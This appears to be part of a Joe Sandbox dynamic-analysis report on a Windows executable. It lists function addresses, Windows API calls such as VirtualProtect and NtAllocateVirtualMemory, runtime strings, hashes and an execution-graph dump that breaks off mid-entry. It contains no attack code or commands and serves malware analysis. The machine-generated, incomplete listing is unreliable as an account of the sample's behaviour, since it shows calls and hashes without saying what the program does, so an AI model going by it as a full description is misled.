                                                                Function 00007FF6CD201394 Relevance: 1.5, APIs: 1, Instructions: 24memorynativeCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CD201156), ref: 00007FF6CD2013F7
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: AllocateMemoryVirtual
                                                                • String ID:
                                                                • API String ID: 2167126740-0
                                                                • Opcode ID: df5726f17078ab6ac065199cd3050d17cfa55e7702da03f535898b72b5525225
                                                                • Instruction ID: 6723c40dec50580138cb98a2a9d63c584b397f0a4c56af7f67b01f64ca11c689
                                                                • Opcode Fuzzy Hash: df5726f17078ab6ac065199cd3050d17cfa55e7702da03f535898b72b5525225
                                                                • Instruction Fuzzy Hash: ABF0B671A18B8582E624DF51F96012A77A1FB48381F009935EBEC82725EF3CE0508B40

                                                                Non-executed Functions

                                                                Function 00007FF6CD203350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: memset$wcscatwcscpywcslen
                                                                • String ID: $0$0$@$@
                                                                • API String ID: 4263182637-1413854666
                                                                • Opcode ID: 7cd9da10e5ba8d0aa83ba8a4f986f40fee152bd6249f645e56411cb3be7ace2c
                                                                • Instruction ID: 0837d0a9f03267c36f7f9e94df1a6da28e68d19186310f74c6661f452a6ce648
                                                                • Opcode Fuzzy Hash: 7cd9da10e5ba8d0aa83ba8a4f986f40fee152bd6249f645e56411cb3be7ace2c
                                                                • Instruction Fuzzy Hash: B5B17231A1CAC199E3218F14E8953ABB7A0FF84385F404136EBD9D6AA6EF7DE145C740
                                                                Function 00007FF6CD202690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                • String ID: 0$X$`
                                                                • API String ID: 329590056-2527496196
                                                                • Opcode ID: dfb1ef97c4b937f6efb939c327d78c634eb2d4bb8dd394944f45c74ac543e4e5
                                                                • Instruction ID: bb57163cc0df4ca32a03c92a88d4f7dfa6895fde2e7aa567bd75a215e70bf323
                                                                • Opcode Fuzzy Hash: dfb1ef97c4b937f6efb939c327d78c634eb2d4bb8dd394944f45c74ac543e4e5
                                                                • Instruction Fuzzy Hash: 48026932A09BC185E7218F15E8543AA77A0FB847A5F404236DBED877A6EF3CE185C740
                                                                Function 00007FF6CD201BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • VirtualQuery.KERNEL32(?,?,?,?,00007FF6CD20A4A0,00007FF6CD20A4A0,?,?,00007FF6CD200000,?,00007FF6CD201991), ref: 00007FF6CD201C63
                                                                • VirtualProtect.KERNEL32(?,?,?,?,00007FF6CD20A4A0,00007FF6CD20A4A0,?,?,00007FF6CD200000,?,00007FF6CD201991), ref: 00007FF6CD201CC7
                                                                • memcpy.MSVCRT ref: 00007FF6CD201CE0
                                                                • GetLastError.KERNEL32(?,?,?,?,00007FF6CD20A4A0,00007FF6CD20A4A0,?,?,00007FF6CD200000,?,00007FF6CD201991), ref: 00007FF6CD201D23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                • API String ID: 2595394609-2123141913
                                                                • Opcode ID: 4fcf98ada4743885cf4745be06d9b2b7b53b0b14eeec15d9d77e2cd9606d3f89
                                                                • Instruction ID: 99da061c42f8e447c9d09071ff584f8b0cd9199745c8e0abb41da45a9ac43063
                                                                • Opcode Fuzzy Hash: 4fcf98ada4743885cf4745be06d9b2b7b53b0b14eeec15d9d77e2cd9606d3f89
                                                                • Instruction Fuzzy Hash: 31419E71B09A8281EA569F01D9A46B927A0FB44BC6F554133DFAEC33A1EE3CF541C341
                                                                Function 00007FF6CD202104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                • String ID:
                                                                • API String ID: 3326252324-0
                                                                • Opcode ID: 5bee38b4a5a680de8b18f3cd75628340502d90423a1d8ff5dcf8a878582094de
                                                                • Instruction ID: 9c48619c3f8990ed721303d4eebf6dab1a7186c274d1fefcd035859f034e6cb8
                                                                • Opcode Fuzzy Hash: 5bee38b4a5a680de8b18f3cd75628340502d90423a1d8ff5dcf8a878582094de
                                                                • Instruction Fuzzy Hash: 4421D031B1998296F6559F41DAA03766260BF54BD6F844032CBAEC7AA5FF2CB8468340
                                                                Function 00007FF6CD201E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 640 7ff6cd201e10-7ff6cd201e2d 641 7ff6cd201e2f-7ff6cd201e38 640->641 642 7ff6cd201e3e-7ff6cd201e48 640->642 641->642 643 7ff6cd201f60-7ff6cd201f69 641->643 644 7ff6cd201ea3-7ff6cd201ea8 642->644 645 7ff6cd201e4a-7ff6cd201e53 642->645 644->643 648 7ff6cd201eae-7ff6cd201eb3 644->648 646 7ff6cd201e55-7ff6cd201e60 645->646 647 7ff6cd201ecc-7ff6cd201ed1 645->647 646->644 651 7ff6cd201f23-7ff6cd201f2d 647->651 652 7ff6cd201ed3-7ff6cd201ee2 signal 647->652 649 7ff6cd201eb5-7ff6cd201eba 648->649 650 7ff6cd201efb-7ff6cd201f0a call 7ff6cd2089c0 648->650 649->643 656 7ff6cd201ec0 649->656 650->651 661 7ff6cd201f0c-7ff6cd201f10 650->661 654 7ff6cd201f43-7ff6cd201f45 651->654 655 7ff6cd201f2f-7ff6cd201f3f 651->655 652->651 657 7ff6cd201ee4-7ff6cd201ee8 652->657 654->643 662 7ff6cd201f5a 655->662 656->651 658 7ff6cd201f4e-7ff6cd201f53 657->658 659 7ff6cd201eea-7ff6cd201ef9 signal 657->659 658->662 659->643 663 7ff6cd201f55 661->663 664 7ff6cd201f12-7ff6cd201f21 signal 661->664 662->643 663->662 664->643 664->651
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: CCG
                                                                • API String ID: 0-1584390748
                                                                • Opcode ID: 981209e0ac3ddb0b4a096b9b655f1816affae7da42ff6b0e70024d2a530dabbb
                                                                • Instruction ID: d690d5b4cdb5346f460efd0d123a74e525035068cf26049d8b7b32d8b4fea1d8
                                                                • Opcode Fuzzy Hash: 981209e0ac3ddb0b4a096b9b655f1816affae7da42ff6b0e70024d2a530dabbb
                                                                • Instruction Fuzzy Hash: 77217431F0C68682FA765A1597A43791181AF887E6F258536DBBFC33D4FE2CB8814281
                                                                Function 00007FF6CD201880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6CD201247), ref: 00007FF6CD2019F9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                • API String ID: 544645111-395989641
                                                                • Opcode ID: 35077ec1f8cf01a8bdaf316ebed73980ffe83aab56c7039b9b06064fa5820d5c
                                                                • Instruction ID: d4dc5c281669871f9b89574493c84b81a238a3c32cb4ec0aed995581fbedd3b1
                                                                • Opcode Fuzzy Hash: 35077ec1f8cf01a8bdaf316ebed73980ffe83aab56c7039b9b06064fa5820d5c
                                                                • Instruction Fuzzy Hash: 0C516A31F0858686EB119F25DA916A92761BB04BD6F488132DBBEC7795EF3CF482C700
                                                                Function 00007FF6CD201800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 699 7ff6cd201800-7ff6cd201810 700 7ff6cd201824 699->700 701 7ff6cd201812-7ff6cd201822 699->701 702 7ff6cd20182b-7ff6cd201867 call 7ff6cd202290 fprintf 700->702 701->702
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: fprintf
                                                                • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                • API String ID: 383729395-3474627141
                                                                • Opcode ID: d62a8b23ab6774a9e186f29f9d1afd359dea50ccd112c61e3c424bc7fed516e9
                                                                • Instruction ID: 97eb1cf27272dfd5532ac9e63a87294f22d27207cc1c60b51785a90a6af2c9c9
                                                                • Opcode Fuzzy Hash: d62a8b23ab6774a9e186f29f9d1afd359dea50ccd112c61e3c424bc7fed516e9
                                                                • Instruction Fuzzy Hash: 2FF06832F1C9C582E611AF64AA510B9A361EB597C2F549231DFDED7651EF1CF5428300
                                                                Function 00007FF6CD20219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000018.00000002.1551652456.00007FF6CD201000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CD200000, based on PE: true
                                                                • Associated: 00000018.00000002.1551591965.00007FF6CD200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551683504.00007FF6CD209000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1551712506.00007FF6CD20B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000018.00000002.1552000244.00007FF6CD484000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_24_2_7ff6cd200000_lzsbffridksl.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                • String ID:
                                                                • API String ID: 682475483-0
                                                                • Opcode ID: 69e6d2f17c288388de4c357c6fbd6a7398df649ea9b9e478042f8ea96f6d9847
                                                                • Instruction ID: 3facc2831f2e78fd41f7fecd92919be15005d8d6247298a786fa10310233e8ec
                                                                • Opcode Fuzzy Hash: 69e6d2f17c288388de4c357c6fbd6a7398df649ea9b9e478042f8ea96f6d9847
                                                                • Instruction Fuzzy Hash: B8012531B0958282F6159F41EE541395270BF48BD6F844033CBADC3AA5FF6CB9518340

                                                                Execution Graph

                                                                Execution Coverage:2.4%
                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:826
                                                                Total number of Limit Nodes:2
                                                                execution_graph 2824 140001ac3 2829 140001a70 2824->2829 2825 140001b36 2828 140001ba0 4 API calls 2825->2828 2826 14000199e 2827 140001a0f 2826->2827 2831 1400019e9 VirtualProtect 2826->2831 2830 140001b53 2828->2830 2829->2825 2829->2826 2829->2830 2831->2826 1996 140001ae4 1998 140001a70 1996->1998 1997 140001b36 2004 140001ba0 1997->2004 1998->1997 1999 14000199e 1998->1999 2002 140001b53 1998->2002 2000 140001a0f 1999->2000 2003 1400019e9 VirtualProtect 1999->2003 2003->1999 2006 140001bc2 2004->2006 2005 140001c04 memcpy 2005->2002 2006->2005 2008 140001c45 VirtualQuery 2006->2008 2009 140001cf4 2006->2009 2008->2009 2013 140001c72 2008->2013 2010 140001d23 GetLastError 2009->2010 2011 140001d37 2010->2011 2012 140001ca4 VirtualProtect 2012->2005 2012->2010 2013->2005 2013->2012 2032 140001404 2105 140001394 2032->2105 2034 140001413 2035 140001394 2 API calls 2034->2035 2036 140001422 2035->2036 2037 140001394 2 API calls 2036->2037 2038 140001431 2037->2038 2039 140001394 2 API calls 2038->2039 2040 140001440 2039->2040 2041 140001394 2 API calls 2040->2041 2042 14000144f 2041->2042 2043 140001394 2 API calls 2042->2043 2044 14000145e 2043->2044 2045 140001394 2 API calls 2044->2045 2046 14000146d 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000147c 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000148b 2049->2050 2051 140001394 2 API calls 2050->2051 2052 14000149a 2051->2052 2053 140001394 2 API calls 2052->2053 2054 1400014a9 2053->2054 2055 140001394 2 API calls 2054->2055 2056 1400014b8 2055->2056 2057 140001394 2 API calls 2056->2057 2058 1400014c7 2057->2058 2059 140001394 2 API calls 2058->2059 2060 1400014d6 2059->2060 2061 1400014e5 2060->2061 2062 140001394 2 API calls 2060->2062 2063 140001394 2 API calls 2061->2063 2062->2061 2064 1400014ef 2063->2064 2065 1400014f4 2064->2065 2066 140001394 2 API calls 2064->2066 2067 140001394 2 API calls 2065->2067 2066->2065 2068 1400014fe 2067->2068 2069 140001503 2068->2069 2070 140001394 2 API calls 2068->2070 2071 140001394 2 API calls 2069->2071 2070->2069 2072 14000150d 2071->2072 2073 140001394 2 API calls 2072->2073 2074 140001512 2073->2074 2075 140001394 2 API calls 2074->2075 2076 140001521 2075->2076 2077 140001394 2 API calls 2076->2077 2078 140001530 2077->2078 2079 140001394 2 API calls 2078->2079 2080 14000153f 2079->2080 2081 140001394 2 API calls 2080->2081 2082 14000154e 2081->2082 2083 140001394 2 API calls 2082->2083 2084 14000155d 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000156c 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000157b 2087->2088 2089 140001394 2 API calls 2088->2089 2090 14000158a 2089->2090 2091 140001394 2 API calls 2090->2091 2092 140001599 2091->2092 2093 140001394 2 API calls 2092->2093 2094 1400015a8 2093->2094 2095 140001394 2 API calls 2094->2095 2096 1400015b7 2095->2096 2097 140001394 2 API calls 2096->2097 2098 1400015c6 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015d5 2099->2100 2101 140001394 2 API calls 2100->2101 2102 1400015e4 2101->2102 2103 140001394 2 API calls 2102->2103 2104 1400015f3 2103->2104 2106 140005a80 malloc 2105->2106 2107 1400013b8 2106->2107 2108 1400013c6 NtRecoverResourceManager 2107->2108 2108->2034 2109 140002104 2110 140002111 EnterCriticalSection 2109->2110 2111 140002218 2109->2111 2112 14000220b LeaveCriticalSection 2110->2112 2116 14000212e 2110->2116 2113 140002272 2111->2113 2115 140002241 DeleteCriticalSection 2111->2115 2112->2111 2114 14000214d TlsGetValue GetLastError 2114->2116 2115->2113 2116->2112 2116->2114 2014 14000216f 2015 140002185 2014->2015 2016 140002178 InitializeCriticalSection 2014->2016 2016->2015 2017 140001a70 2018 14000199e 2017->2018 2022 140001a7d 2017->2022 2019 140001a0f 2018->2019 2020 1400019e9 VirtualProtect 2018->2020 2020->2018 2021 140001b53 2022->2017 2022->2021 2023 140001b36 2022->2023 2024 140001ba0 4 API calls 2023->2024 2024->2021 2832 140002050 2833 14000205e EnterCriticalSection 2832->2833 2834 1400020cf 2832->2834 2835 1400020c2 LeaveCriticalSection 2833->2835 2836 140002079 2833->2836 2835->2834 2836->2835 2837 140001fd0 2838 140001fe4 2837->2838 2839 140002033 2837->2839 2838->2839 2840 140001ffd EnterCriticalSection LeaveCriticalSection 2838->2840 2840->2839 2125 140001ab3 2126 140001a70 2125->2126 2126->2125 2127 140001b36 2126->2127 2128 14000199e 2126->2128 2131 140001b53 2126->2131 2130 140001ba0 4 API calls 2127->2130 2129 140001a0f 2128->2129 2132 1400019e9 VirtualProtect 2128->2132 2130->2131 2132->2128 1986 140001394 1990 140005a80 1986->1990 1988 1400013b8 1989 1400013c6 NtRecoverResourceManager 1988->1989 1991 140005a9e 1990->1991 1994 140005acb 1990->1994 1991->1988 1992 140005b73 1993 140005b8f malloc 1992->1993 1995 140005bb0 1993->1995 1994->1991 1994->1992 1995->1991 2117 14000219e 2118 140002272 2117->2118 2119 1400021ab EnterCriticalSection 2117->2119 2120 140002265 LeaveCriticalSection 2119->2120 2122 1400021c8 2119->2122 2120->2118 2121 1400021e9 TlsGetValue GetLastError 2121->2122 2122->2120 2122->2121 2025 140001800 2026 140001812 2025->2026 2027 140001835 fprintf 2026->2027 2028 140001000 2029 14000108b __set_app_type 2028->2029 2030 140001040 2028->2030 2031 1400010b6 2029->2031 2030->2029 2123 140002320 strlen 2124 140002337 2123->2124 2133 140001140 2136 140001160 2133->2136 2135 140001156 2137 1400011b9 2136->2137 2138 14000118b 2136->2138 2139 1400011d3 2137->2139 2140 1400011c7 _amsg_exit 2137->2140 2138->2137 2141 1400011a0 Sleep 2138->2141 2142 140001201 _initterm 2139->2142 2143 14000121a 2139->2143 2140->2139 2141->2137 2141->2138 2142->2143 2159 140001880 2143->2159 2146 14000126a 2147 14000126f malloc 2146->2147 2148 14000128b 2147->2148 2150 1400012d0 2147->2150 2149 1400012a0 strlen malloc memcpy 2148->2149 2149->2149 2149->2150 2170 140003150 2150->2170 2152 140001315 2153 140001344 2152->2153 2154 140001324 2152->2154 2157 140001160 50 API calls 2153->2157 2155 140001338 2154->2155 2156 14000132d _cexit 2154->2156 2155->2135 2156->2155 2158 140001366 2157->2158 2158->2135 2160 140001247 SetUnhandledExceptionFilter 2159->2160 2161 1400018a2 2159->2161 2160->2146 2161->2160 2162 14000194d 2161->2162 2166 140001a20 2161->2166 2163 14000199e 2162->2163 2164 140001ba0 4 API calls 2162->2164 2163->2160 2165 1400019e9 VirtualProtect 2163->2165 2164->2162 2165->2163 2166->2163 2167 140001b53 2166->2167 2168 140001b36 2166->2168 2169 140001ba0 4 API calls 2168->2169 2169->2167 2173 140003166 2170->2173 2171 1400032b8 wcslen 2244 14000153f 2171->2244 2173->2171 2175 1400034ae 2175->2152 2181 1400033b3 2182 14000345b wcslen 2181->2182 2183 140003471 2182->2183 2184 1400034ac 2182->2184 2183->2184 2186 140003496 wcslen 2183->2186 2185 140003571 wcscpy wcscat 2184->2185 2188 1400035a3 2185->2188 2186->2183 2186->2184 2187 1400035f3 wcscpy wcscat 2190 140003629 2187->2190 2188->2187 2189 14000373e wcscpy wcscat 2192 140003777 2189->2192 2190->2189 2191 140003ad5 wcslen 2193 140003ae3 2191->2193 2194 140003b1b 2191->2194 2192->2191 2193->2194 2196 140003b06 wcslen 2193->2196 2195 140003c2a wcscpy wcscat 2194->2195 2198 140003c5f 2195->2198 2196->2193 2196->2194 2197 140003caf wcscpy wcscat 2200 140003ce8 2197->2200 2198->2197 2199 140003d25 wcscpy wcscat 2202 140003d6c 2199->2202 2200->2199 2201 140003dbe wcscpy wcscat wcslen 2384 14000146d 2201->2384 2202->2201 2207 140003ed5 2470 1400014a9 2207->2470 2208 140004018 2210 14000145e 2 API calls 2208->2210 2216 140003f6c 2210->2216 2212 140004007 2217 14000145e 2 API calls 2212->2217 2213 140005717 2215 1400040aa wcscpy wcscat wcslen 2231 140004180 2215->2231 2216->2213 2216->2215 2217->2216 2219 140003f60 2221 14000145e 2 API calls 2219->2221 2221->2216 2222 140004275 wcslen 2223 14000153f 2 API calls 2222->2223 2223->2231 2224 14000533a memcpy 2224->2231 2225 14000446b wcslen 2631 14000157b 2225->2631 2226 1400046dd wcslen 2228 14000153f 2 API calls 2226->2228 2228->2231 2229 140004fd1 wcscpy wcscat wcslen 2230 140001422 2 API calls 2229->2230 2230->2231 2231->2222 2231->2224 2231->2225 2231->2226 2231->2229 2233 140004563 wcslen 2231->2233 2235 1400026e0 9 API calls 2231->2235 2237 140005113 2231->2237 2238 14000549c memcpy 2231->2238 2239 14000145e NtRecoverResourceManager malloc 2231->2239 2240 1400051be wcslen 2231->2240 2242 140004e25 wcscpy wcscat wcslen 2231->2242 2586 1400014d6 2231->2586 2659 140001521 2231->2659 2757 140001431 2231->2757 2648 1400015a8 2233->2648 2235->2231 2237->2152 2238->2231 2239->2231 2241 1400015a8 2 API calls 2240->2241 2241->2231 2688 140001422 2242->2688 2245 140001394 2 API calls 2244->2245 2246 14000154e 2245->2246 2247 140001394 2 API calls 2246->2247 2248 14000155d 2247->2248 2249 140001394 2 API calls 2248->2249 2250 14000156c 2249->2250 2251 140001394 2 API calls 2250->2251 2252 14000157b 2251->2252 2253 140001394 2 API calls 2252->2253 2254 14000158a 2253->2254 2255 140001394 2 API calls 2254->2255 2256 140001599 2255->2256 2257 140001394 2 API calls 2256->2257 2258 1400015a8 2257->2258 2259 140001394 2 API calls 2258->2259 2260 1400015b7 2259->2260 2261 140001394 2 API calls 2260->2261 2262 1400015c6 2261->2262 2263 140001394 2 API calls 2262->2263 2264 1400015d5 2263->2264 2265 140001394 2 API calls 2264->2265 2266 1400015e4 2265->2266 2267 140001394 2 API calls 2266->2267 2268 1400015f3 2267->2268 2268->2175 2269 140001503 2268->2269 2270 140001394 2 API calls 2269->2270 2271 14000150d 2270->2271 2272 140001394 2 API calls 2271->2272 2273 140001512 2272->2273 2274 140001394 2 API calls 2273->2274 2275 140001521 2274->2275 2276 140001394 2 API calls 2275->2276 2277 140001530 2276->2277 2278 140001394 2 API calls 2277->2278 2279 14000153f 2278->2279 2280 140001394 2 API calls 2279->2280 2281 14000154e 2280->2281 2282 140001394 2 API calls 2281->2282 2283 14000155d 2282->2283 2284 140001394 2 API calls 2283->2284 2285 14000156c 2284->2285 2286 140001394 2 API calls 2285->2286 2287 14000157b 2286->2287 2288 140001394 2 API calls 2287->2288 2289 14000158a 2288->2289 2290 140001394 2 API calls 2289->2290 2291 140001599 2290->2291 2292 140001394 2 API calls 2291->2292 2293 1400015a8 2292->2293 2294 140001394 2 API calls 2293->2294 2295 1400015b7 2294->2295 2296 140001394 2 API calls 2295->2296 2297 1400015c6 2296->2297 2298 140001394 2 API calls 2297->2298 2299 1400015d5 2298->2299 2300 140001394 2 API calls 2299->2300 2301 1400015e4 2300->2301 2302 140001394 2 API calls 2301->2302 2303 1400015f3 2302->2303 2303->2181 2304 14000156c 2303->2304 2305 140001394 2 API calls 2304->2305 2306 14000157b 2305->2306 2307 140001394 2 API calls 2306->2307 2308 14000158a 2307->2308 2309 140001394 2 API calls 2308->2309 2310 140001599 2309->2310 2311 140001394 2 API calls 2310->2311 2312 1400015a8 2311->2312 2313 140001394 2 API calls 2312->2313 2314 1400015b7 2313->2314 2315 140001394 2 API calls 2314->2315 2316 1400015c6 2315->2316 2317 140001394 2 API calls 2316->2317 2318 1400015d5 2317->2318 2319 140001394 2 API calls 2318->2319 2320 1400015e4 2319->2320 2321 140001394 2 API calls 2320->2321 2322 1400015f3 2321->2322 2322->2181 2323 14000145e 2322->2323 2324 140001394 2 API calls 2323->2324 2325 14000146d 2324->2325 2326 140001394 2 API calls 2325->2326 2327 14000147c 2326->2327 2328 140001394 2 API calls 2327->2328 2329 14000148b 2328->2329 2330 140001394 2 API calls 2329->2330 2331 14000149a 2330->2331 2332 140001394 2 API calls 2331->2332 2333 1400014a9 2332->2333 2334 140001394 2 API calls 2333->2334 2335 1400014b8 2334->2335 2336 140001394 2 API calls 2335->2336 2337 1400014c7 2336->2337 2338 140001394 2 API calls 2337->2338 2339 1400014d6 2338->2339 2340 1400014e5 2339->2340 2341 140001394 2 API calls 2339->2341 2342 140001394 2 API calls 2340->2342 2341->2340 2343 1400014ef 2342->2343 2344 1400014f4 2343->2344 2345 140001394 2 API calls 2343->2345 2346 140001394 2 API calls 2344->2346 2345->2344 2347 1400014fe 2346->2347 2348 140001503 2347->2348 2349 140001394 2 API calls 2347->2349 2350 140001394 2 API calls 2348->2350 2349->2348 2351 14000150d 2350->2351 2352 140001394 2 API 